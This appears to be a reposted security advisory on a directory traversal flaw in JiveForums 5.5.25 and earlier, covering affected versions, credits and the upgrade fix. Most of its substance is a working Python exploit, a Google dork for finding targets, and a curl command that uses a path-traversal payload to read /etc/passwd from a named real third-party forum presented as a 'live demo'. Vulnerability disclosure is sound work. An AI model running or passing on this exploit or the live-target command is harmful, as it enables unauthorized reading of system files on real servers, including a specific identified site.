Home / os / winmobile

Jive Forums 5.5.25 Directory Traversal

Posted on 07 February 2016

JiveForums <=5.5.25 Directory Traversal Vulnerability Description ========== Jive forums is a widely recognized network community. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, Emc, Mcafee, Rapid7, Fireeye, etc. The version of JiveForums <=5.5.25 and < 4.0 are vulnerable to a directory traversal security issue, other versions may also be affected. Details ======= Product: JiveSoftware Security-Risk: high Remote-Exploit: yes Vendor-URL: https://www.jivesoftware.com Credits ============ Discovered by: Zhaohuan of Tencent Security Site: http://security.tencent.com Affected Products: ================= Test on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2 maybe work <= 5.5.25 Exploit: ============ #!/usr/bin/python # Author: Zhaohuan || http://weibo.com/hackyou # Google Dork: inurl:servlet/JiveServlet # Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2 # # Software Link: https://www.jivesoftware.com import urllib2 import sys print "JiveForums <=5.5.25 Directory Traversal Exploit" if len(sys.argv) != 3: print "[-] Trying exploit on : <site> <path>" print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0] sys.exit() payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload) readvul=response.read() print readvul Solution: ============ Update to jiveforums 5.5.30 or the latest version. More Information: https://www.jivesoftware.com/services-support/ -------------------------------------------------BTW------------------------------------------------------ Live demo to test exp: http://forums.dcm4che.org/ Curl ¡°http://forums.dcm4che.org/jiveforums/servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg¡± [cid:image001.png@01D15D0F.73914D50] And Request a CVE-ID Number ,thx :)

 

TOP